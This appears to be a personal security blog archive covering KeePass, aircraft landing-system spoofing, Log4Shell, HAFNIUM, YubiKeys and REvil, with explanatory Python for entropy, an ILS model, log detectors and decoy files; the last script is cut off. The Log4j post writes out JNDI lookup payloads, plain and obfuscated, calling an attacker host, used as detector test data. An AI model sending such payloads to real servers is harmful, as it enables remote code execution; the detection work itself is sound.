KeePass and the argument for password managers.

[Update 11th May 2022: I am going to be making changes soon to improve readability of this post, I understand it’s a little more complex than what I am aiming for.]

Passwords. So, let’s start off with the most important question: what makes a good password?

  • Passwords should be at least 14 characters in length.
  • Passwords should be unique, a different password for every account.
  • Passwords shouldn’t contain personal information, such as your birth year or even things like your old street name.
  • Passwords should be a mixture of characters; letters, numbers and symbols, as well as case differences.
  • Passwords should be kept secret, even from those you love and trust… You don’t know how seriously they take security.

Now I wanted to look at the UK NCSC’s guide and their three random word guidance. They recommend using, well… Three random words, claiming that this is more secure than “complex passwords, which can be difficult to remember and yet guessable for criminals.” (www.ncsc.gov.uk, n.d.)

NCSC Technical Director Dr Ian Levy said: “Traditional password advice telling us to remember multiple complex passwords is simply daft.” (www.ncsc.gov.uk, n.d.)

I’m going to be upfront; I disagree… Let me tell you why.

Since about 2014 I have been using a program called KeePass; this program has withstood the external penetration tests I have been aware of, with the testers being unable to breach the software. This was my father’s implementation at his organisation; it wasn’t adopted by all users. However, the admins had been using it, successfully keeping attackers away from important passwords.

Before I show you KeePass, I will look at the positives of the NCSC’s method. The first one that springs to mind is simplicity: not every user is confident installing software on their computer, and coming up with three random words is certainly much simpler and easier to understand than a long list of password requirements. Secondly, compared to a password manager there is no risk of “losing” many passwords in one go. Things can break, or you may lose access to the media that held your password database or key file; this isn’t a problem with the three random words (3RW) method. Finally, password managers can be quite tedious… Sometimes you may find yourself frustrated, going in and out of a password manager multiple times in a short time span. Not just that, but the act of having your database on X media and your key file on Y media is intimidating to some.

Here’s the KeePass prompt you see when you create a database, a simple process you will be walked through the first time. When you create your database, you’ll be given the option to create a key file or link your database to your Windows user account. (I believe this must be a local account, so you may need to switch account type on Windows.) I strongly suggest using one of these; this is the multi-factor aspect of KeePass, with the caveat that a key file only really counts as “something you have” if it lives on different media from the database, otherwise an attacker who copies the one disk has both.

  • Something you know, your password.
  • Something you have, your key file or Windows user account.

We will go over MFA next and explain this in a little more detail, but for now my recommendation for a basic setup of KeePass is to keep your database on a USB stick (you will need the “portable” version for this) and the key file on your personal computer. Best practice would also involve making a backup copy of both the database and the key file; this isn’t required, but it is recommended. A common issue with this is that you’ll constantly be adding new entries to your manager, so you will need to keep both databases up to date. Always save your main database, and periodically copy it over the backup, maybe once a fortnight.

Here’s a KeePass database, fun fact about me: I like to name my servers after planets and workstations after satellites. (Mainly moons but inclusive of other satellites.)

We will go over creating entries and password generation in a moment, but let’s say I wanted to log into the root account on Ganymede. For the sake of my point, I’m going to ignore potential issues with copying passwords onto VMs; a note for the geeks is to configure SSH (or RDP for Windows machines) and port forwarding so you can access machines from a terminal or software like PuTTY. I would simply right-click my Ganymede entry, click Copy Password, and my password will be copied to my clipboard for 15 seconds to paste into my terminal. You would more likely use it for something like your Amazon account or PayPal account. The same applies to your username; the URL field is for the address of the website (or the IP of a server) and notes are for… well, notes.

So how do we use KeePass to create passwords? Start by right clicking anywhere in the folder you wish to create an “entry”, then simply click add entry.

You’ll see the window on the left; click the little key next to the password box and you will be presented with a drop-down selection. Click “Open Password Generator” and the second window, on the right, will pop up. This is your password generator; it lets you determine how you want your passwords to be created. This is a good place to apply those password rules, and it will keep them all together, meaning you no longer need to remember any password other than your database master key. However, do make sure you save after any edits so you don’t lock yourself out of your accounts. This would also be a good place to use a random-word password, but opt for five words over three, as the reward for getting into a password database is worth much more of a wait to an attacker.

Lastly here before we move towards our conclusions, let’s look at how many combinations there are if we take the 171,476 words in the dictionary and have users choose 3.

This gives us 8.403325462709 × 10^14 (about 840 trillion) possibilities. That figure is C(171,476, 3), the number of unordered three-word sets; because the order of the words matters in a password and words may repeat, the space an attacker actually has to search is 171,476^3, roughly 5.0 × 10^15, or about 52 bits. I’m going to save us both the maths on the next one, but add numbers to letters and you have a different story: the number increases again, and again when you start randomising where the capital letters go. However, I’m going to say that a little open-source intelligence is likely to narrow down a person’s three-word password. If we’re talking about how many words the average person has in their vocabulary, estimates work out to about 20,000, a significant drop from our original pool of over 170,000 (three words from 20,000 gives 8 × 10^12, under 43 bits). We are human, and one of our inherent weaknesses is sticking to what we know… Users are still going to use words that mean something to them, or set passwords like MarchTwentyTwo. Without adequately addressing these psychological factors, the three-word method will suffer from the same issues we have had in the past.
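To make the numbers above concrete, and to show what the five-random-word generator setting from the previous section amounts to, here is a small Python script I have added to this post (it is not KeePass code and not from the NCSC page). It computes the keyspace and entropy for three and five words from the dictionary and vocabulary sizes quoted above, and generates a passphrase with the operating system’s CSPRNG. The sixteen-word list inside it is a constructed stand-in for a real wordlist.

```python
import math
import secrets

# Constructed, tiny wordlist for the demo only. A real list (a dictionary, the
# EFF long list) has thousands of entries; the entropy figures below use the
# sizes quoted in the post, not the length of this list.
DEMO_WORDLIST = [
    "apple", "basalt", "candle", "dorsal", "ember", "fjord", "gable",
    "harbour", "indigo", "jasper", "kestrel", "lantern", "marble",
    "nickel", "orbit", "pebble",
]


def unordered_combinations(dictionary_size: int, words: int) -> int:
    """C(n, k): the figure the post quotes (order ignored, no repeats)."""
    return math.comb(dictionary_size, words)


def ordered_keyspace(dictionary_size: int, words: int) -> int:
    """n**k: what an attacker must actually search, because 'red cat dog'
    and 'dog cat red' are different passwords and a word may repeat."""
    return dictionary_size ** words


def entropy_bits(dictionary_size: int, words: int) -> float:
    """Guessing entropy of k words drawn uniformly from n words, in bits."""
    return words * math.log2(dictionary_size)


def generate_passphrase(words: int, wordlist=DEMO_WORDLIST, sep: str = "-") -> str:
    """Pick words with the CSPRNG (secrets), never random.choice()."""
    return sep.join(secrets.choice(wordlist) for _ in range(words))


def main() -> None:
    for n, label in ((171_476, "full dictionary"), (20_000, "typical vocabulary")):
        for k in (3, 5):
            print(f"{label:20s} {k} words: {entropy_bits(n, k):5.1f} bits "
                  f"(keyspace {ordered_keyspace(n, k):.2e})")
    print("C(171476, 3) as quoted in the post:", unordered_combinations(171_476, 3))
    print("example passphrase:", generate_passphrase(5))


if __name__ == "__main__":
    main()
```

The jump from three words (about 52 bits) to five (about 87 bits) is the reason for preferring five inside the database, where nobody has to remember them.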

In conclusion, I have demonstrated a free, open-source password manager that I believe is simple. Whilst it is not as simple as the NCSC’s method and has many more steps to go through, I believe the use case for password managers is not going to disappear. With so many accounts nowadays, users will struggle to remember a unique password for every online store or social media site. The NCSC themselves are aware of this weakness, which means a way to securely store passwords is going to be required no matter what scheme you use to create them. The three-word method will also come with the same human-level weaknesses that only true randomisation can mitigate. Why think of a password when the application you use to store them can think of one for you?

I have decided to push these out piece by piece. This was a chunky read, and if you did read it all then I am honestly thankful… You are taking steps to a safer online presence. I will demonstrate some little offensive techniques soon, which will be linked into this post to give readers a much more informative experience. Additionally, as we lightly touched on in this post, there is something called Open-Source Intelligence (OSINT). We certainly will investigate it when we take a look at phishing, but I encourage you to just give it a google; it’s likely something you do all the time yourself.

Come back next time where we will delve into multi-factor authentication, what is 2FA, 3FA? How effective is MFA? How can I use MFA to protect my account?

Thank you for reading, Sec rity really isn’t possible without u, Stay safe!

http://www.ncsc.gov.uk. (n.d.). NCSC lifts lid on three random words password logic. [online] Available at: https://www.ncsc.gov.uk/news/ncsc-lifts-lid-on-three-random-words-password-logic.

Planes are pretty cool! – Food for thought #3.

Just a little unstructured rambling today from me, I’m sure someone will enjoy the read…

I have begun reading through a 2016 thesis on security in next-generation air traffic communication networks by Martin Strohmeier; it was brought to my attention during discussions about a possible use case for software-defined radio. This isn’t anything new; the first proof of concept I saw of such methods was, I believe, from DEF CON 17 in 2009, but I can’t remember the date off the top of my head.

We can discuss some cool hacking stuff in a second, but first you need to understand how aircraft land. I’m going to briefly discuss this presentation from USENIX and its demonstration of attacks on an aircraft’s Instrument Landing System (ILS). How this is supposed to work: the ILS uses multiple Tx antennas (Tx means transmit; receive and transmit are commonly abbreviated Rx and Tx respectively). The localizer aligns the aircraft laterally with the runway centreline, and the glideslope provides the vertical guidance that controls the aircraft’s rate of descent. Each antenna transmits its signal in a specific way (the carrier is amplitude-modulated with 90 Hz and 150 Hz tones, and the receiver compares the depth of the two tones) so that what the aircraft measures corresponds to its position relative to the runway. If you know enough about radio and security concepts then I highly recommend you read the presentation this refers to; I’m not qualified to discuss it in too much detail but will be trying to learn more about this when I can.

So we discussed how the ILS is responsible for guidance during landing and, very basically, how it goes about doing that. The presentation takes advantage of the behaviour of aircraft ILS receivers. For example, they are designed to “lock on” to the strongest signal, which makes sense when you think that some airports have multiple runways and therefore multiple ILS installations, so a way to figure out which one you need is required. But with what is called an “overshadow attack”, an attacker can simply overpower the legitimate signal with a stronger one carrying their own guidance, provided they have enough information to carry out the attack; that is assumed, since services like FlightRadar24 let anyone track flight paths and a lot of information about these systems is already in the public domain. There is another called a “single-tone attack”, but this is a little less straightforward than overpowering a signal; nevertheless I will touch on it at some point in the future after more reading.
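As an added illustration, not taken from the USENIX paper, here is a simplified receiver model in Python: two localizer-style signals on the same carrier, and a receiver that measures the difference in depth of modulation (DDM) between the 90 Hz and 150 Hz tones to drive the course needle. The assumptions are marked in the comments: same carrier frequency, in-phase arrival, an ideal AM envelope detector, and a DDM sign convention that is mine. It shows why a spoof ten times stronger that says “on course” swamps a legitimate signal saying “you are off course”.

```python
import math

# ICAO localizer facts used here: the carrier is amplitude-modulated with a
# 90 Hz tone and a 150 Hz tone, 0 DDM means "on the centreline" and a DDM of
# 0.155 drives the course deviation needle to full scale. Everything about how
# the receiver combines two signals is a simplified model added for this post.
FULL_SCALE_DDM = 0.155
SAMPLE_RATE = 3000          # samples per second, well above 150 Hz
WINDOW_SECONDS = 1.0        # whole cycles of both tones fit in 1 s


def envelope(amplitude, m90, m150, t):
    """AM envelope of one localizer-style signal at time t."""
    return amplitude * (1.0
                        + m90 * math.cos(2 * math.pi * 90 * t)
                        + m150 * math.cos(2 * math.pi * 150 * t))


def combined_envelope(signals, t):
    """Assumption: all transmitters sit on the same carrier and arrive in
    phase, so their envelopes add linearly at an ideal AM detector."""
    return sum(envelope(a, m90, m150, t) for a, m90, m150 in signals)


def measure_ddm(signals):
    """Demodulate the combined envelope: recover the 90/150 Hz depths by
    correlating against each tone, then form DDM = depth90 - depth150
    (sign convention chosen for this model: positive means 90 Hz dominates)."""
    n = int(SAMPLE_RATE * WINDOW_SECONDS)
    samples = [combined_envelope(signals, i / SAMPLE_RATE) for i in range(n)]
    dc = sum(samples) / n                # carrier level seen by the detector
    depth = {}
    for tone in (90, 150):
        corr = sum(s * math.cos(2 * math.pi * tone * i / SAMPLE_RATE)
                   for i, s in enumerate(samples)) / n
        depth[tone] = 2 * corr / dc      # cosine correlation gives half the depth
    return depth[90] - depth[150]


def needle_deflection(ddm):
    """Fraction of full-scale deflection shown to the pilot, clipped at the stops."""
    return max(-1.0, min(1.0, ddm / FULL_SCALE_DDM))


def make_signal(amplitude, ddm, total_depth=0.40):
    """A localizer keeps the two depths summing to 40%; split them to set the DDM."""
    return (amplitude, (total_depth + ddm) / 2, (total_depth - ddm) / 2)


if __name__ == "__main__":
    legit = make_signal(1.0, ddm=0.08)       # aircraft is genuinely off course
    spoof = make_signal(10.0, ddm=0.0)       # attacker 10x stronger, says "centred"
    print("legitimate only    :", round(measure_ddm([legit]), 4))
    print("with overshadow    :", round(measure_ddm([legit, spoof]), 4))
    print("needle (overshadow):", round(needle_deflection(measure_ddm([legit, spoof])), 3))
```

Under these assumptions the measured DDM is the amplitude-weighted average of the two signals, so the 0.08 DDM that should have told the pilot to correct shrinks to about 0.007, less than 5% of needle travel. Real receivers, antenna patterns and the paper’s own spoofing generator are all more involved than this; the point is only that power decides what the instrument shows.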

Above we went over a high-level explanation of one of the wireless attack types that could be mounted against an ILS. To add to that, one of the biggest concerns I see mentioned is the relative affordability and availability of SDR modules. More people can now carry out these attacks with less equipment than was required before, even from on board the aircraft… With demonstrated offsets of up to 50 metres and the concealment an SDR may provide, this represents a serious attack vector that could be exploited to cause devastation and mass casualties.

Ok, so let’s get to some of the hacker stuff, what even brought this to my attention?

Ukrainian cyber forces have been hard at work. I was discussing this topic with some other hackers and a Ukrainian national given a “free pass” to hit Russia; whilst the topic at first was messing with these systems on board the aircraft, someone raised the idea of instead transmitting signals that would be expected to come from an aircraft. Whilst this again isn’t a new idea, it’s been tested, and even with notification and preparation it caused an absolute nightmare for air traffic control. Furthermore, the opening for a denial-of-service attack is certainly worth highlighting. Nearly every system operated by a human is vulnerable to operator overload, and that’s certainly not exclusive to human operators either. Just sending lots of signals could be all it takes to shut down a section of civilian airspace. It certainly would give Russian airspace controllers a hard time if it was done; however, such an attack would be indiscriminate and, by the nature of naughty things… hard to control.

I will be looking into more of this topic in my spare time. Also, having just started getting competent with the cloud myself, I will be looking to move this site onto an IaaS platform. However, there are many things to weigh up; I might not switch this site itself over, and I also need to explore the options available to me regarding things like subdomains. WordPress is fantastic and not something I want to leave for any reason, but as we move forward aacyber aspires to officially set up and be able to actively assist in keeping everyone in cyberspace safe.

ALDI’s DIY soldering iron is a decent buy for £9.99 and even comes with 7 grams of solder. Sure, it’s not the best in the world, but I’m not selling anything I make yet…

Here comes the “Cyber Army”.

Hello World…

So the Russian government has finally pulled the trigger on its invasion of Ukraine, and since then we have seen information warfare erupt as the Russian dictator tries to deny any wrongdoing. But I wanted to talk about the “Cyber Army” now threatening Russian government infrastructure, not the Ukrainians in particular but the world as a whole.

Anonymous is probably the most well-known group that has been targeting Russia, dumping credentials and PGP keys from the mil.ru domain. That domain has since been geo-fenced to Russian territory. So what’s the issue… Hackers want to stand up for Ukraine and I have an issue with it?

Not just me, but many voices have spoken out about their concerns. Any party not affiliated with a government and/or its intelligence services should leave Russian systems the fuck alone. Firstly, no matter who your target is, this kind of action is strictly prohibited and criminal; it will lead to consequences for anyone carrying out malicious activity… possibly prison time. Secondly, there is a significant risk to legitimate intelligence operations when a bunch of script kiddies start trampling around a system. Imagine hiding for years only to be undone because someone comes along with a drum set…

That is all. I am trying to push my skills more as of recently, so the blog may slow down as I allow time for study. A little bit of a rant, but it needs to be said; that’s my position on this.

Russian Threat Actors

Image Source: https://blog.malwarebytes.com/

Hello World!

Short and sweet here. With tensions between NATO and Russia rising, multiple agencies have put out advisories to keep your eyes peeled for cyber threats out of Russia. I would encourage anyone currently involved in security to review the tactics, techniques and procedures (TTPs) of these actors. Here’s a good report from CISA on the topic, and a good read to help increase resilience to this current threat.

To keep yourself informed on the current cyberspace I recommend CyberWire Daily Podcast, the news is relevant and gives insight from experts in their fields.

Rather technical but it’s a topic that can no longer be avoided, hopefully our nations can work together to de-escalate this situation and work to improve security for citizens all around the world going forward.

2021 – A Year in review.

Hello World!

As 2021 now comes to a close, the effects of the New Year festivities subside and teams, students and professionals sit back down in the office full time. Another year that will surely be packed with surprises awaits us…

2021, like 2020, was marred by the effects of the global coronavirus pandemic and a societal and political divide like never before, pushing us further and further apart at a time when cooperation and diversity are (as always) incredibly important within the IT industry.

That brings me onto the first topic of my review, as I try to take a look at the hybrid warfare that is happening every day. In my opinion, influence and information are the main goals of groups in the current landscape; it likely won’t stay that way, but we are still in the very early stages. With the ability to spew misinformation and disinformation around a critical topic, such as the coronavirus or vaccines, the ability to control information and influence can be used to exacerbate another country’s political unrest as well as to overload health systems worldwide. This topic isn’t specific to this year or the pandemic, as information tactics are used worldwide almost every day… but we must ask ourselves: “Where did this information come from?”, “Is the source trustworthy?”, “Has this information been reviewed by independent experts?”.

As defenders were still feeling the effects of the SolarWinds supply chain attack, in which more than 18,000 SolarWinds customers had installed the trojanised Orion updates the previous December (a much smaller subset of those were then actively exploited), a new problem was found within Microsoft Exchange servers… well, four of them to be precise.

A group given the name HAFNIUM was detected exploiting these four problems in the wild for information theft and espionage. HAFNIUM, who Microsoft have said are “state-sponsored and operating out of China”, are a sophisticated adversary, and Microsoft had to roll out updates in haste. The attackers chained the vulnerabilities in on-premises Exchange; the CVEs associated with this attack are CVE-2021-26855 (the server-side request forgery that gives unauthenticated access), CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 (the latter two used to write arbitrary files). The adversary would then deploy a web shell on the compromised server(s) to keep their foothold and exfiltrate information from the targets. However, it wasn’t just HAFNIUM attempting to exploit these vulnerabilities; threat intel teams detected mass scanning once some time had elapsed.
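Microsoft’s blog post (in the sources below) gives a PowerShell one-liner for hunting CVE-2021-26855 in the Exchange HttpProxy logs: requests with an empty AuthenticatedUser whose AnchorMailbox matches ServerInfo~*/*. The Python below is my own rendering of that same indicator, added here as an example over a constructed, cut-down log sample; the real logs carry many more columns and live under Exchange Server\V15\Logging\HttpProxy.

```python
import csv
import fnmatch
import io

# Constructed sample in the shape of an Exchange HttpProxy log. Only the columns
# the check needs are reproduced; the header is the one Exchange writes after
# its #Software/#Fields comment lines. Hosts and addresses are made up.
SAMPLE_HTTPPROXY_LOG = """\
DateTime,RequestId,ClientIpAddress,AuthenticatedUser,AnchorMailbox,UrlStem,ProtocolAction
2021-03-03T10:15:02.123Z,1111,10.0.0.5,corp\\alice,Sid~S-1-5-21-111,/owa/,
2021-03-03T10:15:09.456Z,2222,203.0.113.7,,ServerInfo~a]@EXCH01.corp.local:444/autodiscover/autodiscover.xml,/owa/auth/,
2021-03-03T10:15:11.789Z,3333,203.0.113.7,,ServerInfo~localhost/ecp/default.flt,/ecp/,
2021-03-03T10:16:40.000Z,4444,10.0.0.9,corp\\bob,Sid~S-1-5-21-222,/ecp/,
"""


def hafnium_ssrf_hits(log_text: str):
    """Apply Microsoft's CVE-2021-26855 indicator to HttpProxy log text:
    an unauthenticated request whose AnchorMailbox looks like
    'ServerInfo~<host>/<path>' (the SSRF abuses the backend-routing logic)."""
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        if row["AuthenticatedUser"] == "" and fnmatch.fnmatchcase(row["AnchorMailbox"], "ServerInfo~*/*"):
            hits.append({"when": row["DateTime"], "src": row["ClientIpAddress"],
                         "anchor": row["AnchorMailbox"], "url": row["UrlStem"]})
    return hits


def sources_to_block(hits):
    """Unique client IPs behind the hits, in first-seen order."""
    seen = []
    for hit in hits:
        if hit["src"] not in seen:
            seen.append(hit["src"])
    return seen


if __name__ == "__main__":
    found = hafnium_ssrf_hits(SAMPLE_HTTPPROXY_LOG)
    for hit in found:
        print(f'{hit["when"]} {hit["src"]:15s} {hit["url"]:12s} {hit["anchor"]}')
    print("sources:", sources_to_block(found))
```

A hit is a reason to pull the server off the network and look for web shells, not just to block the IP; the post-exploitation file writes leave .aspx files under the Exchange web directories that this log check does not see.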

Let’s move to the month of May, probably the most significant month of 2021 in cyber security: we saw five major attacks in that one month, all of which had a significant effect on daily life for a large number of people. They are as follows: the Colonial Pipeline ransomware attack, the Health Service Executive ransomware attack, the Waikato District Health Board ransomware attack, the JBS S.A. cyberattack and the Air India data breach.

So let’s pick up on two factors here, ransomware and healthcare… I won’t elaborate too much on ransomware, as it’s nothing new and it’s not declining, nor is a prediction that “it’ll continue in 2022” worth spending oxygen on; it has become a constant pain in the backside over the last few years and will not be letting up soon. Instead, let’s look at healthcare. Other than critical infrastructure such as water, electricity and so on, healthcare is a key sector where an attack has the ability not only to cause damage but also to change lives and families. The reason healthcare finds itself susceptible to attacks lies in the critical role its staff and systems play on a daily basis, with some of these computers relied upon to save lives or to operate complex machinery. That increases the difficulty of upgrading these systems, not to mention the cost of the product AND the cost to upskill employees on the new equipment/systems… sometimes pushing the task of upgrading or patching systems down the list.

Well, I’m struggling to keep it short and sweet here, but let’s move on to the month of July, when we saw the Kaseya ransomware attack, in which the REvil group claimed to have infected more than one million devices, according to security firm Sophos. This was another supply chain attack: Kaseya said that fewer than 60 of its direct customers were affected, but the impact was felt by up to around 1,500 downstream businesses. The crooks attempted to extort $70m in cryptocurrency for a universal decryptor; however, REvil would soon lose control…

In one of the first public cases of “hacking back” by the FBI that I have seen myself (I wrote a post about it that can be seen here), there was a lot of activity by law enforcement that sparked weeks of speculation before it was confirmed that the FBI had obtained the universal decryption key from the group’s own infrastructure and withheld it for some time. This was done in order not to tip off the cyber gang to the operation, as a decryption key suddenly appearing would surely set alarm bells off in the criminals’ heads. The story had a mostly happy ending, with several members and affiliates arrested, some of the ransom money recovered by law enforcement and the universal decryptor distributed to affected parties.

While there’s tons to potentially discuss on the topic, I’d like this to be a comfortable read… Briefly, I’ll close by mentioning the Log4j vulnerabilities, which since my last blog post have escalated slightly, with more vulnerabilities being discovered in Log4j on an almost weekly basis. No doubt this is due to hackers of all kinds swarming over Log4j, as it marks one of the most significant vulnerabilities in history, as noted by the initial CVSS score of 10.0; the more recent vulnerabilities are less severe. Advice as of this post is that the safe versions are Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7) and 2.17.1 (for Java 8 and later).

Well that’s all in my mini-review. As we look towards another year with newfound hope and motivation, I hope this year is better for all of us and to see more smiles on the faces of people as we all play our role in protecting others.

Sources: https://whatis.techtarget.com/feature/SolarWinds-hack-explained-Everything-you-need-to-know
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/
https://www.techrepublic.com/article/kaseya-supply-chain-attack-impacts-more-than-1000-companies/

Remote Code Execution in Java Apache Log4j 2 (CVE-2021-44228)

Hello World!

The Internet has been rattled over the last couple of days by a new critical bug found in a very ubiquitous library. Currently known vulnerable versions include, but may not be limited to, Apache Log4j 2 versions 2.0-beta9 through 2.14.1 (the 2.10 to 2.14.1 range is the one most often quoted, as those are the versions the configuration workaround applies to). Patches are now mostly available and should be installed as soon as possible; CVE-2021-44228 is being exploited in the wild, and there has even been a case of Log4j payloads being used to drop crypto miners.

Edit 4th January 2022: Updated mitigation information; the current secure versions are as follows: Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).

JNDI – Java Naming and Directory Interface.

LDAP – Lightweight Directory Access Protocol.

A basic flow chart to illustrate the attack methods. Credit: Fastly

Here’s a brief explanation of the exploit from an attacker’s perspective… An attacker-controlled value is passed to the logging library; the attacker then exploits the string lookup feature inside Log4j (a logged value such as ${jndi:ldap://attacker/x}) to make the server fetch an attacker-controlled object over JNDI, which is loaded or deserialised and results in remote code execution on the server. To put this simply for others, this allows the attacker to execute their own code on the server, essentially letting them do anything… (but how far they get will depend on the attacker’s skill level and what the logging process runs as).

Since the 9th of December the cyber security world has been scrambling to mitigate this vulnerability. There are configuration options that let you disable the functionality behind it (setting log4j2.formatMsgNoLookups=true on 2.10 to 2.14.1, or removing the JndiLookup class from the jar), but that is a temporary fix, and the flag alone was later shown not to be a complete one. Update the vulnerable library if you have the ability to, but many people will have to wait for individual patches from the vendors of their products.
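For defenders looking at web logs rather than Java code, here is an added Python example (mine, not from Fastly or the Log4j project) that normalises the lookup obfuscations seen in the wild (the ${lower:…}, ${upper:…} and ${…:-x} default-value tricks, plus URL encoding) and flags the lines that still contain a JNDI lookup afterwards. The log lines are constructed for the demo; the hostnames and addresses are made up.

```python
import re
from urllib.parse import unquote

# Constructed web-server log lines (not real traffic). Lines 1-3 carry the
# plain, an obfuscated and a URL-encoded form of the lookup; 4-5 are benign.
SAMPLE_ACCESS_LOG = [
    '203.0.113.9 - - [10/Dec/2021:12:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:01:04 +0000] "GET /?x=${${lower:j}${::-n}${upper:d}${env:NOPE:-i}:${lower:LDAP}://203.0.113.9:1389/b} HTTP/1.1" 200 512 "-" "curl/7.64"',
    '203.0.113.9 - - [10/Dec/2021:12:01:05 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%2Fc%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2021:12:02:11 +0000] "GET /docs/${version} HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2021:12:02:12 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# an innermost ${...} : no nested braces or '$' inside
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> str:
    """Collapse one innermost lookup the way Log4j 2 evaluates it before the
    JNDI lookup runs. Only the lookups attackers used for obfuscation are
    modelled: the ':-' default-value syntax and the lower/upper lookups."""
    if ":-" in body:                        # ${anything:-X} evaluates to X
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":
        return arg.lower()
    if sep and kind.lower() == "upper":
        return arg.upper()
    return "\x00" + body + "\x01"           # unknown lookup: freeze it, keep scanning


def normalise(text: str) -> str:
    """URL-decode (twice, for double encoding), then collapse nested lookups
    from the inside out until nothing changes. The loop is bounded so a
    hostile line cannot keep us busy."""
    text = unquote(unquote(text))
    for _ in range(50):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text.replace("\x00", "${").replace("\x01", "}")


def is_log4shell_payload(line: str) -> bool:
    """True when a JNDI lookup survives normalisation."""
    return re.search(r"\$\{jndi:", normalise(line), re.IGNORECASE) is not None


def scan(lines):
    """Return (line number, source IP) for every line carrying a payload."""
    hits = []
    for number, line in enumerate(lines, 1):
        if is_log4shell_payload(line):
            hits.append((number, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for number, src in scan(SAMPLE_ACCESS_LOG):
        print(f"line {number}: Log4Shell attempt from {src}")
```

Note what the detector does not tell you: whether the lookup ever reached a vulnerable Log4j instance. Treat hits as attempts and check for outbound LDAP/RMI connections from the application host to confirm.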

On November 24, 2021, Apache was notified about the Log4j remote code execution vulnerability by the Alibaba Cloud Security team. The exploit proof of concept was then posted to Github at 15:32 GMT on December 9, 2021, and we saw the first attempts to trigger callbacks 82 minutes later.

I also received my YubiKeys around the same time, which I haven’t completed setting up yet but plan to have a post about them up soon, it won’t be highly technical as I more want to sell the technology and get the point across why you should be using MFA and/or security keys.

Sources: https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j & Bishop Fox/YouTube

YubiKeys!

Hello World!

I finally bit the bullet and bought myself two YubiKeys and a cover for each. One for my person and one for a safe place configured as a backup.

What’s a YubiKey?

Wikipedia states: “The YubiKey is a hardware authentication device manufactured by Yubico to protect access to computers, networks, and online services that supports one-time passwords, public-key cryptography, and authentication, and the Universal 2nd Factor and FIDO2 protocols developed by the FIDO Alliance.”

Only a short post today but expect to see a post about my initial thoughts and experiences using the YubiKey. There’s currently some cool Black Friday deals going on and I would advise you take a look if you want to step up your account security with YubiKeys!

Combined with a password manager and multi-factor authentication (which is where the YubiKey comes in), this will stop nearly all attempts against your accounts… I have heard of a 99% figure for just 2FA being enabled but don’t have a source at this moment for that figure.

REvil on the run!

Hello World!

Ransomware operators and affiliates of REvil (Ransomware Evil), also known as Sodinokibi, are on the run from the feds this week; one can suspect that the US authorities have it out for them, as this is not the first occasion of direct engagement against this threat actor (TA).

If you follow the story as closely as I do, then you might already be aware of the kerfuffle with the decryption keys a few months ago now, but the official story about it only dropped a couple of weeks ago. Basically, one of Kaseya’s IT management platforms (VSA) was compromised in what we call a supply chain attack, the aim being to hold the companies that use this platform, and their data, to ransom.

This is achieved through the use of a piece of malware known as ransomware, which falls under the category of crypto-malware; see the image below for a look at what a user infected with the WannaCry ransomware would see.

So, what did I mean when I said this isn’t the first engagement… and the recent news of the official story?

Well, the gang took themselves “offline” after attracting too much attention with their attack on Kaseya, then re-emerged from the shadows a few months later. What the gang and their affiliates were unaware of is that a campaign by international law enforcement had compromised their systems, exfiltrated information and, most importantly here, had already compromised the backups that REvil used to restore their infrastructure. So you can see who had the upper hand in this situation.

To step away from the story of REvil and their fight with government hackers (which isn’t going so well for the criminals, who have seen multiple arrests across countries), it would be good to have a brief talk about what we do to defend against ransomware and just how much the battlefield is evolving. Firstly, let’s go all the way back to 1989, when the AIDS Trojan first made its way onto computers via floppy disk; this was the first documented case of a ransomware attack. Victims were asked to send payment to a PO box in Panama; however, because the malware used simple symmetric encryption, security researchers were able to quickly develop tools that recovered the data relatively easily.

Now, you don’t need to know too much about how it has changed over the years, or the technical details of how it encrypts, installs and so on. But let’s step back into 2021 (nearly 2022 as I write this)… Ransomware is no longer just about a “denial of service” to the data: we have seen the rise of double extortion, where they not only encrypt your data but also exfiltrate it and threaten to make it public too!

Our security methods change all the time, but active defence could play an important role in defending against these double-extortion attacks. A network defender can keep creating file shares padded with random but legitimate-looking information, use telemetry simulators to confuse the attackers, and apply many other techniques that give the defender the upper hand: decoys dilute whatever is exfiltrated, and any touch on them is an early warning that something is crawling the shares.
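The decoy-share idea above can be turned into a simple canary check. The Python below is an added example of mine (it is not from the book recommended next or from any product): it plants decoy files with random content in a directory that should hold nothing else, records their hashes, and later reports any decoy that was modified or removed, or any new file that appeared beside them, which is what a ransomware run followed by a ransom note looks like from the share’s point of view. The decoy names are made up and the “ransomware” is a stand-in that overwrites one file.

```python
import hashlib
import os
import secrets
import tempfile

# Made-up decoy names that look like the documents a crew would grab. The
# directory holding them is assumed to contain nothing else, so a new file
# appearing there is itself a signal (ransom notes, .locked siblings).
DECOY_NAMES = ["Q3_forecast_FINAL.xlsx", "payroll_2021.docx", "board_minutes_nov.pdf"]


def plant_decoys(share_dir, names=DECOY_NAMES, size=4096):
    """Write decoys filled with CSPRNG bytes (no real data to leak) and
    return the baseline {path: sha256} to check against later."""
    baseline = {}
    for name in names:
        path = os.path.join(share_dir, name)
        data = secrets.token_bytes(size)
        with open(path, "wb") as fh:
            fh.write(data)
        baseline[path] = hashlib.sha256(data).hexdigest()
    return baseline


def check_decoys(baseline):
    """Return [(path, reason)] for decoys that went missing or changed and
    for unexpected files that appeared next to them. Empty list means quiet."""
    tripped = []
    for path, digest in baseline.items():
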